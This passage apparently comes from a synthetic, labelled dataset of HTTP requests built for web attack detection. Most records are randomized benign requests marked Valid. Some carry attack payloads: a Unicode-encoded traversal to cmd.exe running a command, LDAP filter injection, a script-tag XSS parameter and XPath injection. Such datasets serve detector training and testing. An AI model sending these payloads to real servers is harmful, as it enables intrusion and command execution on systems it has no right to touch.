Expires: Fri, 26 Mar 10 03:52:28 GMT
Last-Modified: Thu, 24 Aug 06 24:13:33 GMT
Host: 125.80.81.217:0
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.0, isiri-3342, iso-2022-jp;q=0.3
Accept-Encoding: gzip
Accept-Language: gim-hYeljn4;q=0.0, ei4e-arAddnQe;q=0.1, m2ynw-a;q=0.4
Cache-Control: no-transform
Client-ip: 149.72.197.199
Cookie: hsepd=hIEjtV;e69Jom6= 
Cookie2: $Version="74"
Date: Sun, 02 May 04 06:08:38 CET
ETag: "Xe2rEz2vPptDIu.1ip"
Expect: mkhuhn=8bheVe8;ujr7eg
From: arebo@ewoTt.gov
If-Modified-Since: Sat, 26 Jul 08 16:34:41 UTC
If-Unmodified-Since: Tue, 15 Jan 08 15:05:36 UTC
If-Match: "8k4yUZjvaWphMqiAS"
If-None-Match: *
If-Range: Sun, 21 Jan 07 04:04:03 CET
Max-Forwards: 79
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWwycGM4ZXRubm56ZXd0c05sbXl5bGVpbHNuaGxlamFlOHp0amxqZWRSYXhvbg==
Authorization: Digest nc=978Ffec8
Range: 76324-
Referer: http://acypcx.net/tahOtwdB.tiff
TE: trailers
Trailer: From
User-Agent: Mozilla/6.6 (compatible; t8ar3hmmu; WinNT; n8ywhegoz; gfhswbetih; daas)
UA-CPU: MIPS
UA-Disp: 6993,500,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8624x050
Via: 4.3 0.189.82.133:6
Transfer-Encoding: identity
Upgrade: dloet/4.5, Feyn5e/9.8, owet/8.5
Warning: 536 www.i6hio.jpeg "noasnsnawtaemRses" 
X-Forwarded-For: 25.177.72.70
X-Serial-Number: 10655264275338066082
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8pe=lIv1iaarpoHblp&nsio7sTrdetm=527120962&nwzfD=nqyFoK&lefils1Ctmlie=f5PV&hJ7t6aeew7weta=r28wZX&ya4=qdnqteen&zKeta&rtdhitsolroni=Nhtacces&d48vynaE7ty=302845&pt5=cKlMDAyzB.&2emioenidgI=YTter9u&xMJnode=eRs

End - Id: 33304
Start - Id: 20033
class: Valid
GET /th/tK8/mMl/e9zz5iEcpirrzV.htm?onFlweyilm1a7n=495&hmdirs=01501565&kFeas22hoee5t=%7E+Hueoeuonercn&udr0hh=%26+n%287sneh&msnooeainyio=7&slteH=daD+l&fmntTOe=echilds&snnoda6csrb=sproTtwp&lrfmtt6w=wH1eustpememc&nphpzf8.bKS=A%25asln12nxrmb%7E&lSOr=plogi+ HTTP/1.0
Host: www.nrn19.biz:28108
Connection: Rl2bx
Accept: application/*, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity;q=0.4, compress
Accept-Language: umsiaald-sdv;q=0.0
Cache-Control: max-stale
Client-ip: 193.232.37.177
Cookie: YRAeT=5htinsertphn4rn;1nhtacces4hvIQIH=507;yhyj=mdprocessing-instructionria8
Cookie2: $Version="58"
Date: Sat, 05 Jan 08 21:02:37 GMT
ETag: W/"ksEKnPVsrlsohuEWwz4"
Expect: eSdnipi
From: npvz8ts@megrcNfoe.biz
If-Modified-Since: Wed, 19 Aug 09 15:35:35 CET
If-Unmodified-Since: Fri, 22 Apr 05 13:01:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 05:17:49 GMT
Max-Forwards: 2
MIME-Version: 6.9
Pragma: o7o9r='s'
Proxy-Authorization: Basic ZWRlbDphbjJuZWVlaQ==
Authorization: NTLM d3NuY3NoMG5KSGE3ZHJ0aG5vcm5uemFucnRlb2Vnc1pleWJkbnBu
Range: 27057-33833
Referer: /s6ttseA/osypne.swf
TE: deflate;q=0.8
Trailer: Upgrade
User-Agent: tpZfdQqA5 http://www.lnibag.st
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6883x9445
Via: FTP/5.1 www.cajhg.js, 7.9 www.1bT0f.js
Transfer-Encoding: gzip
Upgrade: bdhepu/8.1, Vgioj/9.0, cn4dd/3.3, obt/7.0
Warning: 730 107.229.95.139 "66sndnecnvsHlT7t" 
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20033
Start - Id: 14468
class: Valid
GET /lwbuXzKyB/IOjservicesl/NcOzqin/iafha37oRx/vT4zVyFUIioOW/lrYqL0/Ldvhnqeuonoiarf/0eeseNEIta9ge/cogngr4retS6/apiHgoifden0refgmt/La.nsf?seeq=45&psnctul=a8rtfYI%40EPt&rhh8sFnPaatl2n=ni%5Dat+9cmdwIrn&udsEmoriha=9&CCTP.gS=alN385nW3V.H&sksteTeIgeemO=t1+e HTTP/1.1
Host: 178.140.79.196
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 137.67.57.59
Cookie: 7r=5;12=hoVijR8e;.4CoRS=estbU2stlnxqu4e;ebdureeeoetdMI=rirnahhn;rO9n=4651;es1srekhmt=z
Cookie2: $Version="468"
Date: Sun, 09 Nov 08 18:27:29 GMT
ETag: "f66MDt5-FhVArWAl-ffw"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Sat, 03 Jun 06 01:40:05 GMT
If-Unmodified-Since: Tue, 01 May 07 24:55:20 CET
If-Match: "PlJSiCSOd7Y-hZfDo.@R"
If-None-Match: *
If-Range: Sun, 18 Feb 07 01:32:00 UTC
Max-Forwards: 9
MIME-Version: 6.8
Pragma: esItafOs='ohds'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Basic RGVlaEVyYTpscmNkZQ==
Range: 063-,416644-557318
Referer: http://ehtlt5o.biz/tiynnnr/oecnf1/ruKEe6m7/aee4ma.cgi
TE: trailers
Trailer: From
User-Agent: idinopXasA/9.8.1.3
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 332x177
Via: fErt/1.0 10.8.22.162, FTP/5.2 www.6nredn.shtml
Transfer-Encoding: deflate
Upgrade: Iths/7.0, 0tn8e/8.0, sestr/5.4, eaiaus/8.0, odadf/1.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14468
Start - Id: 36606
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.a4fen3unv.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-4, euc-kr;q=0.9
Accept-Encoding: *
Accept-Language: lfo-0tsaruw, sttnr-y
Cache-Control: only-if-cached
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Fri, 01 Apr 05 02:25:14 GMT
ETag: "ia@4ydv.ry8YuSl8RgD"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 61
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: NTLM dHNzNWtjNDMxaWVsZXNpdG9sY3NueGxjc3NpZHJ1dHJ0OWE5b3Q=
Range: 6-,-601,-000578
Referer: /etttzz4d/eile/Yrhqgnss/s8ead.tiff
TE: deflate;q=0.7,trailers,trailers
Trailer: Max-Forwards
User-Agent: rerrz (heUg7.1D; s1MrTTe9; sB8LEwl2s; eruYHIF)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/3.7 239.148.29.218, asbpsz/5.7 www.pl3ug7oe.png, HTTP/0.1 www.tgecc.html:3
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 36606
Start - Id: 36851
class: LdapInjection
GET /AHbinVX92ThV_2LKr/lm/diF/pJBZQXbpyH6-BB.aspx?ehdnrh=daen&cfkczkEk2=nOO9.iw&havi=ri&iwr=n+&anmneoeie8=ifrDW_-rJNm&onriZ=Zan3gho&teeh6hdete4=ar&eaairLa=7226907&5hhIuRr=aramnA+mall+rgl+b&Nk94Kwq7Rrv=154&vgroup bylsd=imgM HTTP/1.1
Host: www.J8eunIaet.st:80
Connection: keep-alive
Accept: text/*, text/*, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ) ( |    (displayName=had*)   (name    =had*  )(mail=had*)
Cache-Control: oIyo=o
Cookie: ea2ae=62506243;lfed=3059200607;8-@L=88410692
Cookie2: $Version="869"
Date: Mon, 05 May 08 05:36:43 CET
From: lvelladt@3trbvtitH.net
If-Unmodified-Since: Mon, 02 Feb 09 03:33:00 GMT
If-Match: "GFONQ2Kta4_W@mnc"
If-None-Match: *
If-Range: *
Max-Forwards: 1
Authorization: apnan eo7o=whpat
Range: -0235,09-
Referer: /rilOn/un0ene/efa9hT/hadersoh.swf
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 9.0; ta-Ib; rv:6.0.4) Gecko/55789733
Transfer-Encoding: compress

null

End - Id: 36851
Start - Id: 13700
class: Valid
GET /sWtthZT@qG2oF/io2ecetsng/tXNYD/h0aTjJzYvHMtIj/ht.asmx?sd=95376 HTTP/1.1
Host: www.hoioOamlg.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.0, deflate;q=0.8, deflate;q=0.5, gzip
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 8.253.133.52
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sun, 01 Jun 08 21:39:09 GMT
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Mon, 08 Jun 09 12:49:20 GMT
If-Unmodified-Since: Thu, 08 May 08 03:56:12 CET
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 57
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: Digest qop=e6ei
Range: 7428-
Referer: /rTan/l3xnn/htagiu/t25oj8W.msf
TE: trailers,trailers,chunked;q=0.4
Trailer: Accept-Language
User-Agent: sbAuoonsas (mD7Km9nSWV; 90f@5Ada; dh5@rMZ; 7Foxgl; dyRszSJag)
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: 1.3 69.142.201.137
Transfer-Encoding: compress
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13700
Start - Id: 46994
class: XSS
GET /sk@v/hNZQCAshome/lvjY/tfexsNh/92fluAt/BUR1e.P/rjbMshf@.m/TULz6HN.png?iIsT=n%5Dt%5BEehtpassrTdm&kCcD7access_logR@=%3Cscript++%3Ealert++%28%22+hzosaoscakGedarh.nesmtb%22%29%3C%2Fscript%3E&YJFF7=l+&EulbetRbRkr=rqm&4bLWjLA=rt5&Teen=jVlNo04&vngroup byy2T4@p=77858 HTTP/1.1
Host: www.hthsutanln.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: dw-eapttn2g;q=0.7, hu-al, s-s
Cache-Control: no-store
Client-ip: 0.51.121.220
Cookie: Ah3aTE=)ssls3as00oy;clfothn8=e1hoPatcaQ;5itgu=02717
Cookie2: $Version="37"
Date: Sun, 14 Sep 08 08:13:36 GMT
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: guie0u@euwn2.st
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 23 Sep 07 04:05:18 CET
If-Match: "v7bhnFPjZJoYNz5Ci"
If-None-Match: *
If-Range: "DzDJpdX@FFDYvvts"
Max-Forwards: 038
MIME-Version: 0.5
Pragma: rlane2i='2'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic d29oT2U3dDplYUhlc3RJ
Range: 5-22964
Referer: http://nguk.st/tg7c/aalsk/1drTs/gcil68N6.pdf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.4 (compatible; MSIE 1.7; Win 9x; nerelbr6)
UA-Disp: 817,484,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: HTTP/5.9 www.nlRhh.tiff, 9.9 119.44.95.43
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 352 28.5.137.111:2561 "wEaonerhna" "Mon, 13 Sep 04 13:04:56 UTC"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46994
Start - Id: 2967
class: Valid
GET /pHrX/Xb6.php4?srteii2e=94321 HTTP/1.0
Host: 57.255.3.123
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.5, cp-936;q=0.5, x-mac-korean, x-mac-chinesesimp;q=0.4, koi8;q=0.2
Accept-Encoding: 
Accept-Language: sTmt-asqt, Wel4snwo-sipIE, U-Fsot0tot;q=0.1, o-sp, x6r-yr;q=0.4
Cache-Control: only-if-cached
Client-ip: 24.115.162.196
Cookie: tplNas8G=s eab?agIwj2d;l3idea=83117;@i@u4_XD_=aJ@ef;sgnoeei=et51n<htq;gii (bpr ;esaGgei4etee=6egiymz0;rcHhongee=0848421129
Cookie2: $Version="1"
Date: Mon, 08 Jan 07 23:24:08 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: Eth9@iyo0iiiw3a.it
If-Modified-Since: Sun, 20 Aug 06 14:26:50 UTC
If-Unmodified-Since: Fri, 02 May 08 22:10:24 GMT
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: "3v_P8YiqkVWdPtu2y3at"
Max-Forwards: 469
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: ijf5 adere02=sleimE8e
Range: 3-,93-,767101-864
Referer: /adEme/12xe.cgi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.5 (X11; U; Solaris 0.3; q1-1e; rv:8.8.4) Gecko/66761109
UA-CPU: MIPS
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: oiija/4.7 www.qieaws.js, 3.2 206.175.104.12, 0.6 www.Vrip.jpeg
Transfer-Encoding: identity
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 1920071
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2967
Start - Id: 49764
class: XPathInjection
GET /fI8retOerpn/ikodmmOu1chee9s4gst/resohv7auv9n/bidseosOhn2p/to4AC5pe.tsR/hHa9DtpqSwpr@/fGYt3nHAP/rx3HkFkQRKYdCp4u./t.3Es/dENlner/ht9eaJsHsEoesahhe/9Preu5duItArdqRre.jpeg?ettSheh=ieweIsaoAodiqe&s6gmnILh09eitid=td-d&6eew=uPU&lreeO=t4baeSi%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%27xm7%27+%3D++%27&aeee=5665149&a842neosvh3=d9w%25l8uemo&B_03W6=30056&at=qYxpw&NI4w6samG=6538&vrdUu=anjMubC2 HTTP/1.0
Host: www.fta9eeg.net
Connection: ateoMt
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: deflate
Accept-Language: grn5-Ecdn;q=0.8, os-0tmaqepi;q=0.4, fmetslo-s;q=0.1
Cache-Control: max-age=824
Client-ip: 253.1.218.202
Cookie: bemoE2Ss=1929
Cookie2: $Version="367"
Date: Thu, 13 Mar 08 10:45:49 UTC
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 100-continue
From: 1ni9pe@Genwbli.net
If-Modified-Since: Sat, 23 Jun 07 08:01:21 CET
If-Unmodified-Since: Mon, 29 Mar 04 19:53:20 UTC
If-Match: "c98mJwrmUi-fEew6u"
If-None-Match: "DCGQMlwt9OyStRuonJp"
If-Range: *
Max-Forwards: 3620
MIME-Version: 6.0
Pragma: 5tttnoa='ict'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: http://idc0r.cz/Qr7weys3/cvT4U6ta.sh
TE: chunked,chunked
Trailer: Referer
User-Agent: deRaoy (h5L@XrsttP)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3095x7377
Via: 3.8 45.22.241.126, 6.3 www.iiw8h2g.css, 5.1 www.ksre.css:4086
Transfer-Encoding: deflate
Upgrade: 2LiSEs/6.7, it8er/8.1
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49764
Start - Id: 17200
class: Valid
GET /tkrkbosahnjrhsl/iedl4nanb/eW@t4Z/eew87CC8eMQ/eSA-1jV5P/eacoma/3hugsEaaet/tru2zeIentaa/e0po3GYUOe9IN4Xn/ebWs/dl6Aoks/rDo0ddPiFJ4.msf?4ahxEsmdeErts=iat%3B&ratyftjs9as=8796874&mdhe9=8155&otizlofr=tei1lemwic&0prEtZ=29329534&wgadminobjectzkl=benn&0rRoolreEijn=817&vf7avy=tOyeyrOEv&nlse=n%29oDu%3FeSe2&qeNa=u4 HTTP/1.0
Host: www.mqsifeder.de
Connection: keep-alive
Accept: image/*;q=0.8, audio/*;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: nb-set8hxoo
Cache-Control: du=lhfioAs7
Client-ip: 106.60.218.207
Cookie: wyeiiLxnshno=k1MZZj@7a1R;1ttcrnaf2nrTt=1;hlezhtr9eltnt=tlOn0str;7Yyx2V.Z9ls=eosh;vtyoslhtEwSa=mo
Cookie2: $Version="62"
Date: Mon, 07 Aug 06 21:31:53 CET
ETag: "t2B8ueXf6S6Bsid@G"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Sun, 21 Sep 08 08:20:50 UTC
If-Unmodified-Since: Fri, 07 Dec 07 13:49:23 GMT
If-Match: "EnkZewFT08IBemf"
If-None-Match: *
If-Range: "-VpQ1PzWeyX0zHr9qAF"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dRini wnbheet=snah
Authorization: Basic WGhuYTp0ZXduc3R0aQ==
Range: 0678-
Referer: /ep3noDgt/e6tea/lfm0mee/ehnar6p6.jsp
TE: gzip;q=0.3
Trailer: Max-Forwards
User-Agent: 4nxre (uv-JYBwAO4; tGrsVt)
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: 2.7 www.dyee.gif, 5.1 115.217.76.25:3291
Transfer-Encoding: compress
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 652 172.163.128.242:14057 "meiaHl" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17200
Start - Id: 3038
class: Valid
GET /LT14fR/nceewnktiaure4noto32/h1herza/teswabsvia1cU/pHh/nrS0gnalnfA.php4?isqlnb=288452&eR=tx6U6&shncba=nmochass&JXhqFdeleteN@=st HTTP/1.1
Host: 228.211.8.154
Connection: close
Accept: audio/x-wav;q=0.2, video/*, image/jpeg;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.1, gzip;q=0.1, deflate;q=0.7, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 45.196.69.200
Cookie: hPamraotru=282033;pimghtaccesuAPvCKr=3ea8e;gtNo=aameo;tsi8uCtbdnm6ta=lselectev oipErlbt]radAm;AjoK=6psLe(oasiaodropc&r0;nOhalhyhnj=181
Cookie2: $Version="42"
Date: Tue, 20 Jul 04 07:18:12 CET
ETag: "EzuQe-OrDGSEFMd2f"
Expect: 100-continue
From: clms@lki1al.be
If-Modified-Since: Thu, 13 Oct 05 19:48:10 CET
If-Unmodified-Since: Tue, 20 Jan 04 15:46:57 UTC
If-Match: *
If-None-Match: "EYXxnozAoyIJDrynIUv"
If-Range: Wed, 23 Jun 04 24:15:34 CET
Max-Forwards: 0409
MIME-Version: 5.8
Pragma: tAai=6St
Proxy-Authorization: Basic dG9laGVlRDplZ0VvdA==
Authorization: go9qn B7xB7er=c2hr
Range: 37991-,-13
Referer: /ohnra/bleer.pdf
TE: deflate
Trailer: Warning
User-Agent: osyRtvtd (swXbzx; e0.8ClMe-_; aQyKfLP)
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 961x9401
Via: HTTP/3.8 6.124.78.253, HTTP/9.3 www.gieew.jpg:4664, 8.8 185.81.180.211
Transfer-Encoding: identity
Upgrade: nbjn/1.7
Warning: 591 www.3tsse.tiff "enecatStOette6te" "Mon, 25 Dec 06 14:44:01 CET"
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 2317803874
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3038
Start - Id: 24553
class: Valid
GET /nottsRrNsnes/hlsy/dyni/tua/du7sktrs8sSatlePey7r/fmDdUvu7VArfPCYrimX/xtAner/htFstepl/aJf/ewmoeio2atve5sulgev/eSaOTcopyV.shtml? HTTP/1.1
Host: 197.24.211.239
Connection: close
Accept: image/gif;q=0.3, text/plain;q=0.1, video/quicktime
Accept-Charset: euc-kr;q=0.3, big5;q=0.1
Accept-Encoding: deflate;q=0.0, gzip, compress;q=0.2, compress;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.196.246.18
Cookie: 2giGElftu=nyrqbe%ws5cf0/opt9l:;5t7h=98;stlscttl1=ael;n3lrg=bf;53n=3519
Cookie2: $Version="50"
Date: Tue, 02 Feb 10 23:06:12 GMT
ETag: "YB2LKGSxc6yUsvNNr-M"
Expect: 100-continue
From: 1ulNhsn@sSweeqd.gov
If-Modified-Since: Sun, 22 Jan 06 02:04:09 UTC
If-Unmodified-Since: Fri, 18 Nov 05 06:03:16 UTC
If-Match: "WlX7-dTry.2wCac-LDYe"
If-None-Match: *
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 38
MIME-Version: 3.2
Pragma: pdsehr3=R
Proxy-Authorization: nfijte ooosrt=8tertwFe
Authorization: NTLM MW9lcnJ0ZWxIaWtlYXZkd3NpM0V3dXQ3c2VhMm9lZmpuY2JC
Range: 8-,-762016
Referer: http://www.Lesfrs.cz/eecbsn/eodk/Ht1a5m.tar
TE: deflate,chunked,deflate;q=0.2
Trailer: Pragma
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 8.5; 9a-ih; rv:0.3.3) Gecko/42680921
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: HTTP/9.4 www.rtdeStri.htm, 1.8 228.15.249.198, ccbst4/2.6 88.236.128.224
Transfer-Encoding: compress
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 453 223.46.17.60:88 "h3yresw" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24553
Start - Id: 19002
class: Valid
GET /z3sm6K2_e5g/bhjne38EreDcorycl/ueodIartenss/homeJ9DtJ8_/u0HZNyLdt/3VXshutdownDqmy45LNt/q3aeIstn0y/sjrJNe2UiyA/axrja05dk2jsXpq27/aate/ontugeacOst4feaa/tijEag7u0.htm?aa2ab=bfSN5Y&a6fCesp=ti3jrkcsu&is1scilc=eaiif7et29ENihOsvb&ye.Iac8U=ngd78tv7zthnut38t&s0tf0nt8sosurGe=1627097&iruhuaTzoRur=1458&q-gx0X-GsconnectCw=tbE&dumtuet=e_O&tfeylrqodCebsc=3009&nmua=TtstI6&sphtwaqireq=c%5Cce&lneFimna1gsa=4uobs HTTP/1.0
Host: www.amie.uk
Connection: eaa5eayc
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: fh=eiN2fhan
Client-ip: 227.16.86.109
Cookie: mtini2h=pek;aiselectbinenye/ 0a
Cookie2: $Version="022"
Date: Mon, 27 Feb 06 15:51:05 GMT
ETag: W/"PxVEB1q-KROBxCvQTDZ"
Expect: teet=klaonh;otq4lce
From: gwNr@ntenns.it
If-Modified-Since: Thu, 08 May 08 17:12:51 GMT
If-Unmodified-Since: Sun, 24 Jul 05 09:20:22 GMT
If-Match: "1bN4u19nD3CBoXMsc"
If-None-Match: *
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 1767
MIME-Version: 9.9
Pragma: tit7n='ihx'
Proxy-Authorization: Digest username="elrscge"
Authorization: Digest nonce
Range: 2800-0168
Referer: /manan/raeTs5t/rcte4oya.pl
TE: chunked;q=0.3,gzip
Trailer: User-Agent
User-Agent: kekrukpd (7n@e.H92P; tXtFzqO2; o@iBE9h-Ez; uQq8-N; r1ar-12IO)
UA-CPU: 68000
UA-Disp: 655,4589,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: obj/4.8 115.201.170.110:6687, HTTP/7.0 www.z3mpix.htm
Transfer-Encoding: gzip
Upgrade: 2ns/8.9, khr/6.8, eHrrl/7.7
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19002
Start - Id: 402
class: Valid
GET /Uniframe9o4e@gdVprocessing-instructiona/vwHh8RN15VCFZz/uDvdPzdGPH/ysZDh.FvsgH4cq2d1az/oa2Imfbdutenrtrwe78/bocohsych1bs3sn5/pba_./yEr3senpsdnor/1Ston/nitwOYRYty/9JXu1a_n_YPx/hQAT5o.php4?tarozon=ag9ktlEt&Oth=Itp5aasoerht%3F%5Cefn&NagbrhnnownhnpR=30562955&Ss=aperleh HTTP/1.1
Host: www.nm5Hthiy.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-874;q=0.5, windows-1250, euc-kr;q=0.5, euc-tw
Accept-Encoding: *;q=0.6
Accept-Language: hEkyece-iHaU;q=0.5, wstk-Strbftsi, ynn-rettiw;q=0.7
Cache-Control: siCGsnaJ='Olsh'
Client-ip: 5.95.31.54
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="619"
Date: Sat, 08 May 04 06:19:58 CET
ETag: W/"KhY94V.KOTkZsGgAVLf"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Mon, 15 Sep 08 12:18:46 CET
If-Unmodified-Since: Fri, 22 Dec 06 23:53:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: drgtl='Rvkaahm'
Proxy-Authorization: Digest nonce
Authorization: qi0mms ieelo=oeireh1e
Range: 63476-77033,-529,5-
Referer: http://www.emirs7m.cz/mapjitr3/tpriob/rae0r/scos.txt
TE: gzip;q=0.1,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/7.1 (Windows; U; Win 9x 6.8; ha-nn; rv:7.2.1) Gecko/07543955
UA-CPU: Sparc
UA-Disp: 6142,708,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7545x2141
Via: FTP/4.6 219.208.106.161:5858
Transfer-Encoding: eedecj
Upgrade: sajgfN/7.8, n2wam/2.4
